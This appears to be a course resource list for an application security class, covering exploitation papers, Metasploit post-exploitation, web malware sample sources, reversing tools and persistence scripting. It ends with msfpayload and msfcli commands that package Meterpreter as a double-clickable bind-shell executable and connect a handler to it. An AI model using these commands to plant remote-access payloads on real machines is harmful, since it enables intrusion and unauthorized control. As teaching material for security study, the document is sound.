Application Security and Vulnerability Analysis

General References

• Tactical Exploitation by HDM (paper)
• Meta-Post-Exploitation by valsmith
• Meterpreter Post exploitation - Recap
• Social Engineering Using Metasploit Express
• Using Metasploit Express to Own a Domain

Finding Web Malware Samples

• Malware Domain List
• PhishTank Phish Archive
• Example Javascript malware from Dean
• The SQLi string used the ASProx bot discussed Clientsides 2008

Reversing Web Malware

• Malzilla
• SpiderMonkey
• Mina (developed by course professor Stephen Ridley)
• jsunpack
• PDFiD and pdf-parser

Developing Persistence Tools

• VBScript
• VBScript User's Guide
• Methods (Windows Script Host)
• Windows Privesc Check

Meterpreter Documentation

• The scripts directory in Metasploit has a few sample scripts
• lib/rex/post/meterpreter.rb defines the Meterpreter API
• Rex rdoc
• Automating Meterpreter and scraper.rb

If the meterpreter API doesn't natively do what you want it to, try uploading and executing one of Nirsoft's utilities.

You don't have to exploit anything to get a Meterpreter instance running. You can bundle Meterpreter into an executable to double-click and run with the following msfpayload commands:

create payload:

• ./msfpayload windows/meterpreter/bind_tcp LPORT=4444 X > meterpreter.exe

to listen for connections:

• ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=192.168.1.110 LPORT=4444 E